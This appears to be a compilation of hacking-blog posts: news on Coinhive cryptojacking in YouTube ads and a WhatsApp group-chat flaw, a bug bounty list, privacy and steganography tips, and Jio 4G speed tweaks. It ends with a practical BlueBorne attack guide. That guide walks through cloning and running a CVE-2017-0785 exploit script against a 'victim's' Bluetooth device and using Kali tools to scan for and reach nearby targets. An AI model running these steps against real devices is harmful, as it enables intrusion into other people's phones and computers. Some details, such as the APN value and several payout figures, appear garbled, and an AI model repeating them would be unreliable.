CRYPTOJACKING VIA YOUTUBE ADS? MINING MONERO?

YouTube viewers are upset that their computers are being used for cryptocurrency mining due to YouTube ads being hijacked with Coinhive.



Cryptojacking is a process that hijacks other peoples’ computers to mine cryptocurrency for themselves. Bitcoin and other digital coins are traded using a digital network called a blockchain, which must remain online at all times. Mining effectively keeps the lights on and provides the power for all the number crunching necessary to keep the blockchain going. Users who generate lots of power are rewarded with coins.




While the value of cryptocurrencies continues to fluctuate, the desire for people to mine them hasn’t abated at all. In fact, many individuals look for additional ways to enhance their cryptocurrency mining. One option that many have turned to is the notorious Coinhive code that is often embedded in websites. Now it’s shown up in
YouTube ads as users of the video streaming platform are complaining of having their computers used to mine crypto for some third party.

MALICIOUS ADS TAKE MORE THAN YOUR TIME


Everyone who uses YouTube knows of their irritating ads. Most of them play before a video can be watched, but some will pop up in the middle of a streaming video. They’re an annoyance, but at least they only steal a few seconds of your time. That changed for a short time when a number of YouTube ads were hijacked with the Coinhive code.
The affected ads were from Google’s DoubleClick platform. Basically, the ads contained JavaScript that enabled cryptocurrency mining through
Coinhive . YouTube users found their computer resources being consumed at a high rate (80%!) to mine Monero.




An independent security researcher, Troy Mursch, told Ars Technica :

YouTube was likely targeted because users are typically on the site for an extended period of time. This is a prime target for cryptojacking malware, because the longer the users are mining for cryptocurrency the more money is made.

                    GOOGLE RESPONDS


Once reports of the YouTube ads being used to mine Monero came out, Google (parent company of YouTube) said that the issue had been dealt with within two hours. However, data from social media and Trend Micro, a cybersecurity company, showed that the infected ads ran for up to a week.


Google did release an official statement that reads:

Mining cryptocurrency through ads is a relatively new form of abuse that violates our policies and one that we’ve been monitoring actively. We enforce our policies through a multi-layered detection system across our platforms which we update as new threats emerge. In this case, the ads were blocked in less than two hours and the malicious actors were quickly removed from our platforms.

The never-ending arms race between protection and hackers continues. The reality is that attempts by some people to get others to mine crypto for them, without their knowledge.



Keep learning keep hacking


 Watch Video:-

Top 32 Bug Bounty Programs in 2018

A bug bounty program is a deal offered by many websites and software developers by which individuals can receive recognition and compensation for reporting bugs, especially those pertaining to exploits and vulnerabilities.


1) Intel


Intel's bounty program mainly targets the company's hardware, firmware, and software.


Limitations: It does not include recent acquisitions, the company's web infrastructure, third-party products, or anything relating to McAfee.
Minimum Payout: Intel offers a minimum amount of $500 for finding bugs in their system.


Maximum Payout: The Company pays $30,000 maximum for detecting critical bugs.


Bounty Link: https://security-center.intel.com/BugBountyProgram.aspx


2) Yahoo


Yahoo has its dedicated team that accepts vulnerability reports from security researchers and ethical hackers.


Limitations: The Company does not offer any reward for finding bugs in yahoo.net, Yahoo 7 Yahoo Japan, Onwander and Yahoo operated Word press blogs.
Minimum Payout: There is no set limit on Yahoo for minimum payout.
Maximum Payout: Yahoo can pay $15000 for detecting important bugs in their system.

Bounty Link: https://safety.yahoo.com/Security/REPORTING-ISSUES.html



3) Snapchat


Snapchat security team reviews all vulnerability reports and acts upon them by responsible disclosure. The company, we will acknowledge your submission within 30 days.
Minimum Payout: Snapchat will pay minimum $2000.
Maximum Payout: Maximum they will pay is $15,000.

Bounty Link: https://support.snapchat.com/en-US/i-need-help

4) Cisco


Cisco encourages individuals or organization that are experiencing a product security issue to report them to the company.

Minimum Payout: Cisco's minimum payout amount is $100.

Maximum Payout: Company will give maximum $2,500 to finding serious vulnerabilities.


Bounty Link: https://www.cisco.com/c/en/us/about/security-center/security-vulnerability-policy.html



5) Dropbox


Dropbox bounty program allows security researchers to report bugs and vulnerabilities on the third party service HackerOne.

Minimum Payout: The minimum amount paid is $12,167.

Maximum Payout: The maximum amount offered is $32,768.

Bounty Link: https://www.dropbox.com/help/security/report-vulnerability



6) Apple


When Apple first launched its bug bounty program it allowed just 24 security researchers. The framework then expanded to include more bug bounty hunters.
The company will pay $100,000 to those who can extract data protected by Apple's Secure Enclave technology.
Minimum Payout: There is no limited amount fixed by Apple Inc.


Maximum payout: The highest bounty given by Apple is $200,000 for security issues affecting its firmware.


Bounty Link: https://support.apple.com/en-au/HT201220



7) Facebook


Under Facebook's bug bounty program users can report a security issue on Facebook, Instagram, Atlas, WhatsApp, etc.

Limitations: There are a few security issues that the social networking platform considers out-of-bounds.
Minimum Payout: Facebook will pay a minimum of $500 for a disclosed vulnerability.
Maximum Payout: There is no upper limit fixed by Facebook for the Payout.


Bounty Link: https://www.facebook.com/whitehat/


8) Google


Every content in the .google.com, .blogger, youtube.com are open for Google's vulnerability rewards program.


Limitations: This bounty program only covers design and implementation issues.
Minimum Payout: Google will pay minimum $300 for finding security threads.
Maximum Payout: Google will pay the highest bounty of $31.337 for normal Google applications.


Bounty Link: https://www.google.com/about/appsecurity/reward-program/

9) Quora

Quora offers Bug Bounty program to all users and researchers to find and report security vulnerabilities.


Minimum Payout: Quora will pay minimum $100 for finding vulnerabilities on their site.

Maximum Payout: Maximum payout offered by this site is $7000.


Bounty Link: https://engineering.quora.com/Security-Bug-Bounty-Program


10) Mozilla

Mozilla rewards for vulnerability discoveries by ethical hackers and security researchers.


Limitations: The bounty is offered only for bugs in Mozilla services, such as Firefox, Thunderbird and other related applications and services.

Minimum Payout: Minium amount given by Firefox is $500.


Maximum Payout: The Company is paying a maximum of $5000.

Bounty Link: https://www.mozilla.org/en-US/security/bug-bounty/


11) Microsoft


Microsoft's current bug bounty program was officially launched on 23rd September 2014 and deals only with Online Services.
Limitations: The bounty reward is only given for the critical and important vulnerabilities.


Minimum Payout: Microsoft ready to pay $15,000 for finding critical bugs.


Maximum Payout: Maximum amount can be $250,000.

Bounty Link: https://technet.microsoft.com/en-us/library/dn425036.aspx

12) OpenSSL
OpenSSL bounty allows you to report vulnerabilities using secure email (PGP Key). You can also report vulnerabilities to the OpenSSL Management Committee.


Minimum Payout: The Company pays minimum bounty rewards of $500.


Maximum Payout: The highest amount given by the company is $5000.


Bounty Link: https://www.openssl.org/news/vulnerabilities.html


13) Vimeo


Vimeo welcomes any security vulnerability reporting in their products as the company pays good rewards to that person.


Minimum payout: The Company will pay minimum $500


Maximum Payout: The maximum amount paid by this company is $5000.


Bounty Link: https://vimeo.com/about/security


14) Apache

Apache encourages ethical hackers to report security vulnerabilities to one of their private security mailing lists.


Minimum payout: The minimum pay out amount given by Apache is $500.


Maximum Payout: This Company can maximum give a reward of $3000.
Bounty Link: https://www.apache.org/security/


15) Twitter

Twitter allows security researchers and experts about possible security vulnerabilities in their services. The company encourages people to find bugs.

Minimum Payout: Twitter is paying minimum $140 amount.

Maximum Payout: Maximum amount pay by the company is $15000.

Bounty Link: https://support.twitter.com/articles/477159

16) Avast


Avast bounty program rewards ethical hackers and security researchers to report Remote code execution, Local privilege escalation, DOS, scanner bypass amongst other issues.

Minimum Payout: Avast can pay you the minimum amount of $400.

Maximum Payout: The maximum amount offered by the company is $10,000.

Bounty Link: https://www.avast.com/bug-bounty


17) Paypal

Payment gateway service Paypal also offers bug bounty programs for security researchers.

Limitations:

Vulnerabilities dependent upon social engineering techniques, Host Header
Denial of service (DOS), User defined payload, Content spoofing without embedded links/HTM and Vulnerabilities which require a jailbroken mobile device, etc.

Minimum Payout: Paypal can pay minimum $50 for finding security vulnerabilities in their system.

Maximum Payout: Maximum payout amount given by Paypal is $10000.

Bounty Link: https://www.paypal.com/us/webapps/mpp/security-tools/reporting-security-issues



18) GitHub

GitHub's runs bug bounty program since 2013. Every successful participant earned points for their vulnerability submissions depending on the severity.


Limitation: The security researcher will receive that bounty only if they respect users' data and don't exploit any issue to produce an attack that could harm the integrity of GitHub's services or information.

Minimum Payout: Github pays a minimum amount of $200 for finding bugs.

Maximum Payout: Github can pay $10000 for finding critical bugs.

Bounty Link: https://bounty.github.com/


19) Uber

The vulnerability rewards program of Uber primarily focused on protecting the data of users and its employees.


Minimum Payout: There is no predetermined minimum amount.

Maximum Payout: Uber will pay you $10,000 for finding critical bug issue.

Bounty Link: https://eng.uber.com/bug-bounty/


20) Magento
Magneto bounty program allows you to report security vulnerabilities in Magneto software or websites.


Limitations:
Following security research is not eligible for the bounty
Potential or actual denial of service of Magento applications and systems.
Use of an exploit to view data without authorization.
Automated/scripted testing of web forms


Minimum Payout: Minimum payout amount for this is bounty program is $100.


Maximum Payout: Magento is paying maximum $10,000 for finding critical bugs.


Bounty Link: https://magento.com/security


21) Perl

Perl is also running bug bounty programs. If someone found a security vulnerability in Perl, they can contact the company.


Minimum Payout: The Company pays a minimum amount of $500.

Maximum Payout: The highest amount given by Perl


22) PHP


PHP allows ethical hackers to find a bug in their site.
Limitations: You need to check the list of already finding bugs. If you not follow this instruction your bug is not considered.


Maximum Payout: Minimum Payout amount is $500.


Minimum Payout: Maximum $1500 is given by PHP for searching important bug


Bounty Link: https://bugs.php.net/report.php?bug_type=Security


23) Starbucks

Starbucks runs bug Bounty program to protect their customers. They encourage to find malicious activity in their networks, web and mobile applications policies.


Minimum Payout: The minimum amount paid by Starbucks $100.


Maximum Payout: The maximum amount goes up to $4000.


Bounty Link: https://www.starbucks.com/whitehat


24) AT&T


AT&T also has its bug hunting channel. Developers and security experts can research the various platforms like websites, APIs, and mobile applications.


Minimum Payout: Minimum Amount Paid by them is $500.


Maximum Payout: There is no such upper limit for payout.
Bounty Link: https://bugbounty.att.com/home.php


25) LinkedIn

The LinkedIn welcomes Individual researchers who contribute their expertise and time to find bugs.
The company will reward you, but neither minimum nor maximum amount is a fix for this purpose.


Bounty Link: https://security.linkedin.com/posts/2015/private-bug-bounty-program



26) Paytm
Paytm invites independent security groups or individual researchers to study it across all platforms


Limitations:
Reports that state that software is out of date/vulnerable without a 'Proof of Concept.'
XSS issues that affect only outdated browsers.
Stack traces that disclose information.
Any fraud issues


Minimum Payout: The Company will pay minimum $15 for finding bugs.


Maximum Payout: This company does not fix the upper limit.


Bounty Link: https://paytm.com/offer/bug-bounty/


27) Shopify

Shopify's Whitehat program rewards security researchers for finding severe security vulnerabilities


Minimum Payout: The minimum amount paid by the Shopify is $500.

Maximum Payout: There is no fix upper limit for paying the bounty.

Bounty Link: https://www.shopify.in/whitehat


28) Word Press

WordPress also welcomes security researchers to report about the bugs that they have found.


Minimum Payout: WordPress Pays $150 minimum for reporting bugs on their site.


Maximum Payout: The Company does not fix a maximum limit to pay as bounty.


Bounty Link: https://make.wordpress.org/core/handbook/testing/reporting-bugs/


29) Zomato


Zomato helps security researcher to identified security-related issues with company's website or apps.


Minimum Payout: Zomato will pay minimum $1000 for finding important bugs.


Maximum Payout: There is no maximum fix amount.


Bounty Link: https://www.zomato.com/security

30) Tor Project

Tor Project's bug bounty program covers two of its core services: its network daemon and browser.

Limitation: OpenSSL applications are excluded from this scope.

Minimum Payout: The minimum amount paid by them is $100.

Maximum Payout: The Company will pay you maximum $4000.

(No link available) Bounty Link:
security@lists.torproject.org


31) Hackerone

HackerOne is one of the biggest vulnerability coordination and bug bounty platform. It helps companies to protect their consumer data by working with the global research community for finding most relevant security issues. Many known companies like Yahoo, Shopify, PHP, Google, Snapchat, and Wink are taking the service of this website to give a reward to security researchers and ethical hackers.


Bounty Link: https://hackerone.com/bug-bounty-programs


32) Bugcrowd


A powerful platform connecting the global security researcher community to the security market. This site aims to provide right mix and type of researcher suited according to the specific website to their worldwide clients. The hackers just need to select their reports on this site, and if they can detect right bugs, the specific company will pay the amount to that person.


Bounty Link: https://www.bugcrowd.com/bug-bounty-list/

How to Erase Your Personal Info From Google

You have Deleted your BROWSER HISTORY But Google Still has your Browsing History , Read this Article to know How to Delete .


It’s your Google Activity (formerly known as Google Web & App History), and it knows everything you’ve searched .


This post will teach you how to permanently delete your Google history to enhance your internet privacy and prevent your search and browsing data from following you around forever.

Note : Clearing your browser history is NOT the same as clearing your Google Web & App Activity history. When you clear your browser history, you’re only deleting the history that’s locally stored on your computer. Clearing your browser history doesn’t do anything to the data stored on Google’s servers.






How to download and delete your Google search history and stop Google from saving your activity





How to download all your Google data


Google’s Takeout feature lets you download data from all of the Google products you use, including your Google Search history, Gmail, Calendar, Chrome, Google Photos, Maps, and more. Here’s how to use Takeout to download all your Google data.


Step 1: From your Google Takeout “Download your data” page , select the data you’d like to download . By default, all of the boxes are selected. Select Next .

Step 2: Select your archive format and delivery method, then select Create archive . (We stuck with the default settings.)

Step 3: You’ll receive a notification when the archiving process is complete. In this example, we received an email with a link to download our archive.

Now that you’ve downloaded an archive of your data, you’re ready to delete your history.


______________________________________________________



How to delete all your Google activity



Use these steps to delete data about all your Google activity, including your searches, video searches, and any ads you’ve clicked on.

Step 1: From your My Activity page , select the vertical ellipsis (⋮) , then select Delete activity by .

Step 2: Change the date from Today to All time. Select All products from the product drop-down menu, then select DELETE.

Step 3: Google will tell you how it uses your data to make its services more useful for you. Select OK .

Step 4: Google will ask you if you want to delete your activity. Select DELETE.

Step 5: Your screen should now say “ No activity.”

Congratulations. You’ve now deleted your Google search history. Here’s to blank slates! Next up: Get Google to stop saving your activity.
_______________________________________________________


How to stop (or “pause”) Google from saving your activity



Google doesn’t provide a way to permanently disable it from saving your activity, but you can hit pause . Use these steps to hit pause on Google saving your activity.


Step 1: From your Activity controls page , you’ll see a section for “Web & App Activity.”
Slide the switch to the left .

Step 2: Google will ask if you’d like to pause your Web & App Activity. Select PAUSE .

Step 3: Check to see if your activity is paused. The screen should say “Web & App Activity (paused)” and the sliding toggle should be grey.

Step 4: If you want to hit “pause” on Google logging your activity on ALL the Google apps and services you use, slide all the switches on this page to the left.
Read the important information for each item and select PAUSE to complete each step.

Mission accomplished! Google won’t be saving your search data any more.   ☺☺☺☺

Steganography ? How to Hide Private Files in Images | Full Tutorial

Steganography is the art of hiding messages in such a way that no one, apart from the sender and receiver, suspects the existence of the hidden data. In this tutorial, you’ll learn a neat trick using which you can hide whatever data you want behind an image of your choice.

How to hide data inside images?

Create a folder. Name it anything you wish, say hide.

Now put anything and everything you want to hide in this folder. Text files, other images, executables – anything. Also, put the image behind which you want to hide the files in the same directory, say “image.jpg”.

Now we need to archive this folder. You can use your choice of compression tool for this (I recommend the free and open source 7-zip). So now we have hide.zipcontaining all of the data we want to hide behind an image.

Software used for compress any files

7-Zip

GNU Lesser General Public License

Compressor

Proprietary software

WinZip

Proprietary software

WinRAR

Commercial Licen

You should have your image, say image.jpg (inside of which we’ll hide our data) in the same directory as hide.zip (next to it).

Now simply open up the command prompt and move to the folder where image.jpg and hide.zip are located using the cd command:

cd PATH

For example:

cd C:\Folder cd desktop

Now we type in the following command:

copy /b image.jpg + hide.zip output.jpg

After running this command, you should see an output.jpg in the folder and if you look closely, you’ll notice that it’s size has increased by approximately the size of the archive. Our data is now hidden behind the image.

The newly created output.jpg behaves like a normal image file, but you can also view the hidden data by opening the file with your compression tool, say 7-zip (Right click -> Open with -> 7-zip).



And that’s It! Now you can send this image to anyone, what others will see is just a regular image but if the recipient knows, they will be able to access the secret information privately. You can also do this for other file types as well such as .mp3, .wmv, .txt etc.

Of course, this is just a little trick and not a substitute for proper encryption (it could be if you added a password to your archive file). Still, it isn’t exactly subtle if you hide tens or hundreds of megabytes of data behind an innocent image file, which is why you should use proper encryption tools such as veracrypt if you have some important or confidential data that you wish to keep hidden.

WhatsApp Flaw Could Allow 'Potential Attackers' to Spy On Encrypted Group Chats

A more dramatic revelation of 2018—an outsider can secretly eavesdrop on your private end-to-end encrypted group chats on WhatsApp and Signal messaging apps.


Considering protection against three types of attackers—malicious user, network attacker, and malicious server—an end-to-end encryption protocol plays a vital role in securing instant messaging services.


The primary purpose of having end-to-end encryption is to stop trusting the intermediate servers in such a way that no one, not even the company or the server that transmits the data, can decrypt your messages or abuse its centralized position to manipulate the service.


In order words—assuming the worst-case scenario—a corrupt company employee should not be able to eavesdrop on the end-to-end encrypted communication by any mean.


However, so far even the popular end-to-end encrypted messaging services, like WhatsApp, Threema and Signal, have not entirely achieved zero-knowledge system.



Researchers from Ruhr-Universität Bochum (RUB) in Germany found that anyone who controls WhatsApp/Signal servers can covertly add new members to any private group, allowing them to spy on group conversations, even without the permission of the administrator.

As described by the researchers, in the pairwise communication (when only two users communicate with each other) server plays a limited role, but in case of multi-user chats (group chat where encrypted messages are broadcasted to many users), the role of servers increases to manage the entire process.

That's where the issue resides, i.e. trusting the company's servers to manage group members (who eventually have full access to the group conversation) and their actions.

As explained in the newly published RUB paper, titled "More is Less: On the End-to-End Security of Group Chats in Signal, WhatsApp, and Threema," since both Signal and WhatsApp fail to properly authenticate that who is adding a new member to the group, it is possible for an unauthorized person—not a group administrator or even a member of the group—to add someone to the group chat.




According to the researchers, a compromised admin or rogue employee with access to the server could manipulate (or block) the group management messages that are supposed to alert group members of a new member.

"The described weaknesses enable attacker A, who controls the WhatsApp server or can break the transport layer security, to take full control over a group. Entering the group, however, leaves traces since this operation is listed in the graphical user interface. The WhatsApp server can therefore use the fact that it can stealthily reorder and drop messages in the group," the paper reads.

"Thereby it can cache sent messages to the group, read their content first and decide in which order they are delivered to the members. Additionally, the WhatsApp server can forward these messages to the members individually such that a subtly chosen combination of messages can help it to cover the traces."

WhatsApp has acknowledged the issue, but argued that if any new member is added to a group, let's say by anyone, other group members will get notified for sure.

"We've looked at this issue carefully. Existing members are notified when new people are added to a WhatsApp group. We built WhatsApp so group messages cannot be sent to a hidden user," a WhatsApp spokesperson told Wired.

"The privacy and security of our users is incredibly important to WhatsApp. It's why we collect very little information and all messages sent on WhatsApp are end-to-end encrypted."

But if you are not part of a group with very selected members, I'm sure many of you would relatively ignore such notifications easily.
Researchers also advised companies to fix the issue just by adding an authentication mechanism to make sure that the "signed" group management messages come from the group administrator only.

However, this attack is not easy (exception—services under legal pressure) to execute, so users should not be worried about it.























                                                                      Hacker news

Beware ! Smartphone Apps Listens To Your Voice How To Stop It

 I Have Told That Smartphone Apps Listens To Your Voice How To Stop It  If You Are An Android User Or iPhone User Then You Should Must Read This Article At Least Once.There Is So Many Apps In Play Store & App Store Who Listens To Your Conversations Silently In Background & Send It To Their Server.

The company says that it does use peoples' microphones, but only to help them out – and there’s an easy way of turning it off

Facebook could be listening in on people’s conversations all of the time, an expert has claimed.

The app might be using people’s phones to gather data on what they are talking about, it has been claimed.

Facebook says that its app does listen to what’s happening around it, but only as a way of seeing what people are listening to or watching and suggesting that they post about it.

Professor Burns has said that the tool appears to be using the audio it gathers not simply to help out users, but might be doing so to listen in to discussions and serve them with relevant advertising. She says that to test the feature, she discussed certain topics around the phone and then found that the site appeared to show relevant ads.

 

Watch video for how to stop it 

                                                                  
















                                                                   Hacker news

HOW TO INCREASE JIO 4G NET SPEED [AWESOME TRICKS]

Steps to Increase Jio 4G Speed


1. First visit setting option on your phone.

2. Then visit the Mobile Networks option from settings.

3. Then click on access point name of your reliance Jio Sim.

4. You need to select the sim slot of Jio Sim.

 5. Select Menu which is available at top right corner and chooses new APN then click Save.(APN setting is Given Below)



Setting the APN Network to Increase Jio 4g Speed



Name – jio 4g
APN – joined
APN Type – Default
Proxy – Not Set
Port – Not Set
Username – Not Set
Password – Not Set
Server – www.google.com
MMSC – Not Set
MMS proxy – Not Set
MMS port – Not Set
MCC – 405
MNC – 857, 863 or 874
Authentication type – PAP
APN Protocol – IPv4/IPv6
Bearer-LTE


So by means of following this trick method you’re simply converting few things to your mobile network, it won’t harm your device. You can change the settings at any time. If you make those changes, then you will get the high-speed net.





Step – 1 How to Increase Jio 4G Speed and Band Coverage



If you are not interested in downloading any app or application then you have to follow these simple tricks, by this trick you can easily Increase your Jio 4G speed . This trick will also increase the band coverage so those who are struggling with VPN they can also try this trick. You have to choose these options



1. Best coverage: Band 5 > Band 3 > Band 40. 2. Best speed: Band 40 > Band 3 > Band 5


To increase speed follow these steps


Open dialer application and Dial

👉*#*#4636#*#*

👉Select phone information option
Select “Set preferred network type”

👉Select LTE Only





Steps to increase jio 4g speed For Qualcomm processor


👉Install Shortcut Master (Lite) application from Play Store.

👉Then go to Menu > Search

👉Type “carrier menu” or “engineering mode” and then search.

👉Open if found and access to change LTE bands


Steps to increase Jio 4G speed For MediaTek processor

👉Install MTK Engineering Mode from 2&play store

👉Open and Run the application

👉Then select ‘MTK Settings’

👉After that Select ‘BandMode’

👉Select SIM slot where you have placed your Jio SIM

👉Select ‘LTE mode’

👉Select band 40 for best speed or band 5 for best coverage




Step – 2 How To Increase Jio 4G Speed: APN Settings



By making few changes in APN will make a big change in increase jio 4g speed. By following the below step you can easily change APN setting:-


Step 1: Go to Device Android ‘Settings’ > ‘Cellular Networks’ >‘Access Point Names’


Step 2: Now you have to click the profile named: jio 4g and change most effective entries there is given below and depart the remaining as default


Server: www.google.com

Authentication Type: None

APN type: Default

Bearer: LTE

Now click on ‘Save’ changes and then select profile again.




Step – 3 How to Increase Jio Speed: Clear Cache


Android system stores a lot of data through the use of few documents and apps for reinforcing user revel in. These files data is referred to as because of the cache. Reliance jio works the little bit exclusive it no longer most effective associated with sim settings, the jio apps data prevents you from downloading huge content. So eliminating cache will helps you enhance internet speed. Follow these steps to growth jio speed.

1. Go To Your Device Android Settings
2. Then visit Storage and USB
3. Under Internal Storage just tap on cached Data
4. Just confirm by clicking OK on clear cached Data
5. That’s it, You just got increased Jio Speed

Step – 4 How to Increase Jio 4G Speed

• First, download the VPN master app or snap VPN app from play store, or you could even download any app both are made for the same purpose.

• After downloading the app just open it.

• Then after starting the app, the server will set to India country and it’ll take up to fifteen seconds to connect and sometimes only 2-3 seconds it takes to connect.

• After connecting to VPN you can check that download speed it’ll hit the maximum speed with in a second.

If the internet speed isn’t progressed you can change the country, but this could work anyways. If anybody asks me what is the first- class trick on the way to increase jio 4g speed I’m able to pick this.

Blueborne Attack? Complete Practical 5 Billion device at Risk

BlueBorne: Critical Bluetooth Attack Puts Billions of Devices at Risk of Hacking



If you are using a Bluetooth enabled device, be it a smartphone, laptop, smart TV or any other IoT device, you are at risk of malware attacks that can carry out remotely to take over your device even without requiring any interaction from your side.


Security researchers have just discovered total 8 zero-day vulnerabilities in Bluetooth protocol that impact more than 5.3 Billion devices—from Android, iOS, Windows and Linux to the Internet of things (IoT) devices—using the short-range wireless communication technology.


Using these vulnerabilities, security researchers at IoT security firm Armis have devised an attack, dubbed BlueBorne, which could allow attackers to completely take over Bluetooth-enabled devices, spread malware, or even establish a "man-in-the-middle" connection to gain access to devices' critical data and networks without requiring any victim interaction.




All an attacker need is for the victim's device to have Bluetooth turned on and obviously, in close proximity to the attacker's device. Moreover, successful exploitation doesn't even require vulnerable devices to be paired with the attacker's device.


These vulnerabilities include:


👉Information Leak Vulnerability in Android (CVE-2017-0785)


👉Remote Code Execution Vulnerability (CVE-2017-0781) in Android's Bluetooth Network Encapsulation Protocol (BNEP) service



👉Remote Code Execution Vulnerability (CVE-2017-0782) in Android BNEP's Personal Area Networking (PAN) profile


👉The Bluetooth Pineapple in Android—Logical flaw (CVE-2017-0783)
Linux kernel Remote Code Execution vulnerability (CVE-2017-1000251)


👉Linux kernel Remote Code Execution vulnerability (CVE-2017-1000251)


👉Linux Bluetooth stack (BlueZ) information leak vulnerability (CVE-2017-1000250)


👉The Bluetooth Pineapple in Windows—Logical flaw (CVE-2017-8628)


👉Apple Low Energy Audio Protocol Remote Code Execution vulnerability (CVE Pending)




Google and Microsoft have already made security patches available to their customers, while Apple iOS devices running the most recent version of its mobile operating system (that is 10.x) are safe.




👇👇How to Perform👇👇

CVE-2017-0785 STEP 1

Now at this point, I am wondering if Armis left this information out of the white paper intentionally, if you send more packets to the device you can dump a lot more memory, and in this memory, you will see some interesting things. They say you can find "encryption key, address space and valuable pointers (of code and or data) that can be used to bypass ASLR while exploiting a separate memory corruption vulnerability", so let's see what I found!

The dangers of Bluetooth implementations: Unveiling zero day vulnerabilities and security flaws in modern Bluetooth stacks.




Open kali linux Terminal


Type

cd Desktop

git clone
  https://github.com/mailinneberg/BlueBorne.git

cd BlueBorne

ls

chmod  +x  CVE-2017-0785.py

ls

sudo apt-get install bluetooth libbluetooth-dev

 sudo pip install pybluez 

sudo pip install pwntools

ls


python CVE-2017-0785.py

Now script is run TARGET xx:xx:xx:xx:xx  its address of bluetooth which i want to attack

How to grab victim's bluetooth MAC address

FIRE UP Kali


Let's start by firing up Kali and opening a command prompt. I hope it goes without saying that you need a Linux-compatible Bluetooth adapter to continue from here.




Use Hciconfig to Enable Your Bluetooth Adapter

The first step is to check whether our Bluetooth adapter is recognized and enabled. We can do this with a built-in BlueZ tool called

hciconfig:


Type

 hciconfig

As you can see in this screenshot, we do have a Bluetooth adapter that has a MAC address of 10:AE:60:58:F1:37. The Bluetooth stack has named it "hci0." Now, let's make certain it is up and enabled:



hciconfig hci0 up

Good, hci0 is up and ready to work!




Scan for Bluetooth Devices with Hcitool


The BlueZ stack also has some excellent command line (cli) tools for scanning for Bluetooth devices. These are in located in
hcitool . Let's first use the scanning portion of this tool to look for Bluetooth devices that are sending out their discover beacons (in discovery mode). Type:

 hcitool scan

In the screenshot above, you can see it found two devices, ANDROID BT and SCH-I535. Now, let's try the inquiry (inq) command in hcitool to garner more information about these devices:



hcitool inq

Note that it also displays clock offset and the class. The class indicates what type of Bluetooth device it is, and we can look up the code by going to the Service Discovery webpage on the Bluetooth SIG site to see what type of device it is. Or, as we will see later, some tools will do this for us.
Hcitool is a powerful command line interface to the Bluetooth stack that can do many, many things. In the screenshot below, you can see some of the commands that it can execute. Many of the Bluetooth-hacking tools that we will be using in future tutorials simply use these commands in a script. You can easily create your own tool by using these commands in your own script.



Scan for Services with Sdptool




Service discovery protocol (SDP) is a Bluetooth protocol for searching for services. BlueZ has a tool called sdptool that is capable of browsing a device for the services it provides. We can use it by typing:


sdptool browse <MAC Address>

Here we can see that this tool was able to pull information on all the services this device is capable of using.


See if They Are Reachable with L 2 ping



Now that we have the MAC addresses of all the nearby devices, we can ping them, whether they are in discover mode or not, to see whether they are in reach.

 l2ping <MAC address>

This indicates that the device with a the MAC address 76:6F:46:65:72:67 is within range and reachable




Scan for Bluetooth Devices with BTScanner



For those of you who are more comfortable with a GUI-based tool, Kali has BTScanner. Simply type:


btscanner

When you type in BTScanner, it opens a rudimentary GUI interface with commands along the bottom. To do an inquiry scan, simply type the letter "i" on your keyboard. In this case, BTScanner found the two that I found with hcitool, as well as an additional one, MINIJAMBOX.

To gather more information about the device, simply place the cursor over the device and hit
Enter on your keyboard. It will then display all of the information it has gathered about the device, similar to sdptool.

In this case, this is the information about the SCH-I535 device. Notice about a third of the way down the screen, under class, it identifies it as a "Phone/Smart phone" from its class number, 0x5a020c.